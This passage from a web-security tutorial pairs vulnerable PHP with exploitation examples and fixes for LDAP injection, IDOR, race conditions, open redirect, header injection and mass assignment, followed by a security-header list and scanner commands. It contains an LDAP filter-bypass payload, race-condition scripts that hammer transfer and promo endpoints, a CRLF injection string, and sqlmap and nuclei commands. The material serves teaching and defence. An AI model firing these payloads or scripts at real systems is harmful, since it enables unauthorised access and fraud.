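# The characters that carry meaning inside a filter *value*. A per-character
# table, unlike chained replace() calls, cannot re-escape its own output.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}

# The bypass payload from the page's exploitation section.
BYPASS_PAYLOAD = "*)(uid=*))(|(uid=*"


def escape_filter_value(value: str) -> str:
    """Return value with each filter metacharacter replaced by its \\XX form."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(username: str, password: str) -> str:
    """The page's vulnerable construction: raw input spliced into the filter."""
    return f"(&(uid={username})(userPassword={password}))"


def build_filter(username: str, password: str) -> str:
    """Same filter, every user-controlled value escaped first."""
    return (f"(&(uid={escape_filter_value(username)})"
            f"(userPassword={escape_filter_value(password)}))")


def count_uid_clauses(filter_text: str) -> int:
    """How many real '(uid=' clauses the filter contains; the injection adds two."""
    return filter_text.count("(uid=")


if __name__ == "__main__":
    print("unsafe:", build_filter_unsafe(BYPASS_PAYLOAD, "anything"))
    print("safe:  ", build_filter(BYPASS_PAYLOAD, "anything"))
```

The unsafe filter ends up with three `(uid=...)` clauses and an OR branch the developer never wrote; the escaped one still has exactly one, searching for a user whose uid is literally the payload. Escaping is necessary for the lookup, but, as the PHP fix above does, the password itself should be checked with a bind against the found DN rather than compared inside the filter.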

17. Insecure Direct Object Reference (IDOR)

❌ Vulnerable Code

PHP
<?php
// Download any user's file
$file_id = $_GET['id'];
$file = "/uploads/" . $file_id . ".pdf";
readfile($file);
?>

💣 Exploitation

BASH
# Sequential ID enumeration
/download.php?id=1
/download.php?id=2
/download.php?id=3

# UUID guessing (if predictable)
/download.php?id=00000000-0000-0000-0000-000000000001

# Base64 encoded IDs
/download.php?id=MQ== (1 in base64)
/download.php?id=Mg== (2 in base64)

✅ Secure Code

PHP
<?php
session_start();

$file_id = $_GET['id'];
$user_id = $_SESSION['user_id'];

// Check ownership
$stmt = $conn->prepare("SELECT * FROM files WHERE id = ? AND user_id = ?");
$stmt->bind_param("ii", $file_id, $user_id);
$stmt->execute();
$result = $stmt->get_result();

if ($result->num_rows === 0) {
    die('Access denied');
}

$file = $result->fetch_assoc();
readfile($file['path']);
?>

18. Business Logic Flaws

❌ Vulnerable Code

PHP
<?php
// Race condition in money transfer
$balance = get_balance($_SESSION['user_id']);
$amount = $_POST['amount'];

if ($balance >= $amount) {
    transfer($amount, $_POST['to_user']);
    update_balance($_SESSION['user_id'], $balance - $amount);
}
?>

💣 Exploitation

Race Condition

PYTHON
import requests
import threading

def transfer():
    requests.post('https://bank.com/transfer', data={
        'amount': 1000,
        'to_user': 'attacker'
    })

# Send 100 simultaneous requests
threads = [threading.Thread(target=transfer) for _ in range(100)]
for t in threads: t.start()

Negative Values

BASH
# Transfer negative amount (increase balance)
amount=-1000

# Price manipulation
price=-100
quantity=1

Integer Overflow

BASH
# Large quantity causes overflow
quantity=999999999999999999999999999999

✅ Secure Code

PHP
<?php
// Reject negative and non-integer amounts instead of abs()-ing them into valid ones
$amount = filter_var($_POST['amount'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($amount === false) {
    die('Invalid amount');
}
$to_user = (int)$_POST['to_user'];
$from_user = (int)$_SESSION['user_id'];

$conn->begin_transaction();

try {
    // Conditional UPDATE: the balance check and the debit are one atomic statement,
    // so two concurrent requests cannot both pass the check on the same balance.
    // (SELECT ... FOR UPDATE inside the transaction is the alternative when the row must be read first.)
    $stmt = $conn->prepare("UPDATE users SET balance = balance - ? WHERE id = ? AND balance >= ?");
    $stmt->bind_param("iii", $amount, $from_user, $amount);
    $stmt->execute();

    if ($stmt->affected_rows !== 1) {
        throw new RuntimeException('Insufficient funds');
    }

    $stmt = $conn->prepare("UPDATE users SET balance = balance + ? WHERE id = ?");
    $stmt->bind_param("ii", $amount, $to_user);
    $stmt->execute();

    $conn->commit();
} catch (Exception $e) {
    $conn->rollback();
}
?>

19. Race Conditions

❌ Vulnerable Code

PHP
<?php
// Promo code usage
$code = $_POST['code'];
$used = check_if_used($code, $_SESSION['user_id']);

if (!$used) {
    apply_discount($code);
    mark_as_used($code, $_SESSION['user_id']);
}
?>

💣 Exploitation

PYTHON
import requests
from concurrent.futures import ThreadPoolExecutor

def use_promo():
    r = requests.post('https://shop.com/apply_promo', 
        data={'code': 'SAVE50'},
        cookies={'session': 'victim_session'})
    return r.text

# Use same promo code 100 times simultaneously
with ThreadPoolExecutor(max_workers=100) as executor:
    results = list(executor.map(lambda _: use_promo(), range(100)))

print(f"Successfully used: {sum('success' in r for r in results)} times")

✅ Secure Code

PHP
<?php
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // default since PHP 8.1: errors become exceptions

// SELECT ... FOR UPDATE cannot lock a row that does not exist yet, so two first-time
// redemptions can both see zero rows and both proceed. Let the database enforce it:
// promo_usage has UNIQUE (code, user_id), the INSERT goes first, and the loser of the
// race gets a duplicate-key error before any discount is applied.
$conn->begin_transaction();

try {
    $stmt = $conn->prepare("INSERT INTO promo_usage (code, user_id) VALUES (?, ?)");
    $stmt->bind_param("si", $_POST['code'], $_SESSION['user_id']);
    $stmt->execute(); // throws mysqli_sql_exception (error 1062) on a duplicate

    apply_discount($_POST['code']);

    $conn->commit();
} catch (mysqli_sql_exception $e) {
    $conn->rollback();
    die('Promo code already used');
} catch (Exception $e) {
    $conn->rollback();
    throw $e;
}
?>
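Sections 18 and 19 describe the same defect, a check and a write that are separate operations, and the same cure, making the database do both at once. The following is an added example, not code from the original page: the read-check-write transfer and the atomic conditional UPDATE side by side on an in-memory SQLite table, plus the UNIQUE-constraint promo redemption. Rather than relying on thread timing, two requests are interleaved by hand (both read, then both write), which makes the overdraft deterministic. The accounts, balances and promo code are constructed.

```python
"""Added example (not from the original page): TOCTOU transfer vs atomic
conditional UPDATE, and UNIQUE-constraint promo redemption (sections 18, 19)."""
import sqlite3


def fresh_db(balance: int = 100) -> sqlite3.Connection:
    """Two accounts: id 1 holds `balance`, id 2 is empty (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, balance INTEGER NOT NULL)")
    conn.execute("INSERT INTO accounts VALUES (1, ?)", (balance,))
    conn.execute("INSERT INTO accounts VALUES (2, 0)")
    conn.execute("CREATE TABLE promo_usage (code TEXT, user_id INTEGER, UNIQUE (code, user_id))")
    conn.commit()
    return conn


def read_balance(conn: sqlite3.Connection, account: int) -> int:
    return conn.execute("SELECT balance FROM accounts WHERE id = ?", (account,)).fetchone()[0]


def _write_balance(conn: sqlite3.Connection, account: int, new_balance: int) -> None:
    conn.execute("UPDATE accounts SET balance = ? WHERE id = ?", (new_balance, account))
    conn.commit()


def _credit(conn: sqlite3.Connection, account: int, amount: int) -> None:
    conn.execute("UPDATE accounts SET balance = balance + ? WHERE id = ?", (amount, account))
    conn.commit()


def racy_interleaved(conn: sqlite3.Connection, amount: int = 80) -> tuple:
    """The page's vulnerable pattern with two requests A and B interleaved:
    both read the balance before either writes, so both pass the check."""
    bal_a = read_balance(conn, 1)
    bal_b = read_balance(conn, 1)          # B reads before A has written
    transfers = 0
    for stale_balance in (bal_a, bal_b):    # each request acts on its own stale copy
        if stale_balance >= amount:
            _write_balance(conn, 1, stale_balance - amount)
            _credit(conn, 2, amount)
            transfers += 1
    return transfers, read_balance(conn, 1), read_balance(conn, 2)


def atomic_transfer(conn: sqlite3.Connection, src: int, dst: int, amount: int) -> bool:
    """Check and debit in one statement: the WHERE clause is evaluated under the
    row's write lock, so a concurrent caller sees the already-reduced balance."""
    if amount <= 0:
        raise ValueError("amount must be positive")
    with conn:  # one transaction: commit on success, rollback on exception
        cur = conn.execute(
            "UPDATE accounts SET balance = balance - ? WHERE id = ? AND balance >= ?",
            (amount, src, amount),
        )
        if cur.rowcount != 1:
            return False   # insufficient funds (or unknown account); nothing changed
        conn.execute("UPDATE accounts SET balance = balance + ? WHERE id = ?", (amount, dst))
    return True


def redeem_promo(conn: sqlite3.Connection, code: str, user_id: int) -> bool:
    """Insert first; the UNIQUE constraint is the lock. The loser gets IntegrityError."""
    try:
        with conn:
            conn.execute("INSERT INTO promo_usage (code, user_id) VALUES (?, ?)", (code, user_id))
    except sqlite3.IntegrityError:
        return False
    return True   # apply the discount only after this returns True


def demo() -> dict:
    racy = racy_interleaved(fresh_db(100), amount=80)
    conn = fresh_db(100)
    atomic = (atomic_transfer(conn, 1, 2, 80), atomic_transfer(conn, 1, 2, 80),
              read_balance(conn, 1), read_balance(conn, 2))
    promo = [redeem_promo(conn, "SAVE50", 7) for _ in range(3)]
    return {"racy": racy, "atomic": atomic, "promo": promo}


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

With a starting balance of 100 and two 80-unit requests, the racy version completes both transfers and credits 160 while debiting only 80; the atomic version completes the first, refuses the second with `rowcount == 0`, and the books balance. The promo redemption succeeds once and fails on every retry, with no read-before-write window at all.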

20. Additional Vulnerabilities

Open Redirect

❌ Vulnerable

PHP
<?php
$url = $_GET['redirect'];
header("Location: " . $url);
?>

💣 Exploit

BASH
?redirect=https://evil.com/phishing
?redirect=//evil.com
# javascript: is not executed by browsers when it arrives in a Location header; it only
# matters where the same value is also written into a link or used client-side
?redirect=javascript:alert(1)

✅ Secure

PHP
<?php
$allowed = ['https://example.com', 'https://shop.example.com'];
$url = $_GET['redirect'];

if (in_array($url, $allowed)) {
    header("Location: " . $url);
}
?>

HTTP Header Injection

❌ Vulnerable

PHP
<?php
$name = $_GET['name'];
header("X-User-Name: " . $name);
?>

💣 Exploit

BASH
# Note: PHP's header() has refused values containing CR or LF since 5.1.2, so this
# payload applies to other stacks or to code that writes raw headers itself
?name=Admin%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0d%0a%0d%0a<script>alert(1)</script>

✅ Secure

PHP
<?php
$name = preg_replace('/[\r\n]/', '', $_GET['name']);
header("X-User-Name: " . $name);
?>

Mass Assignment

❌ Vulnerable

PHP
<?php
$user = new User();
foreach ($_POST as $key => $value) {
    $user->$key = $value; // Dangerous!
}
$user->save();
?>

💣 Exploit

BASH
# POST request
name=John&email=john@example.com&isAdmin=1&role=admin

✅ Secure

PHP
<?php
$allowed = ['name', 'email', 'phone'];
$user = new User();

foreach ($_POST as $key => $value) {
    if (in_array($key, $allowed)) {
        $user->$key = $value;
    }
}
$user->save();
?>

🛡️ Defense Checklist

Input Validation

  • ✅ Whitelist allowed characters
  • ✅ Validate data types
  • ✅ Check length limits
  • ✅ Use regex patterns
  • ✅ Sanitize all user input

Output Encoding

  • ✅ HTML entity encoding
  • ✅ JavaScript encoding
  • ✅ URL encoding
  • ✅ CSS encoding
  • ✅ Context-aware escaping

Authentication

  • ✅ Strong password policy
  • ✅ Multi-factor authentication
  • ✅ Account lockout
  • ✅ Session management
  • ✅ Password hashing (bcrypt, Argon2)

Authorization

  • ✅ Role-based access control (RBAC)
  • ✅ Principle of least privilege
  • ✅ Object-level authorization
  • ✅ Function-level authorization

Security Headers

APACHE
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
# The legacy XSS auditor has been removed from Chromium and introduced side channels of its own;
# disable it and rely on CSP instead of setting "1; mode=block"
X-XSS-Protection: 0
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy: geolocation=(), microphone=(), camera=()

🔍 Testing Tools

Automated Scanners

BASH
# Burp Suite
# OWASP ZAP
# Nikto
nikto -h https://target.com

# SQLMap
sqlmap -u "http://target.com/page?id=1" --dbs

# XSStrike
python3 xsstrike.py -u "http://target.com/search?q="

# Nuclei
nuclei -u https://target.com -t cves/

Manual Testing

BASH
# Nmap
nmap -sV -sC target.com

# cURL
curl -X POST -d "param=value" https://target.com

# ffuf (fuzzing)
ffuf -u https://target.com/FUZZ -w wordlist.txt

# wfuzz
wfuzz -c -z file,wordlist.txt https://target.com/FUZZ

⚠️ Legal Disclaimer: This document is for educational purposes only. Attacking systems without permission is illegal. Use it only in authorised penetration tests.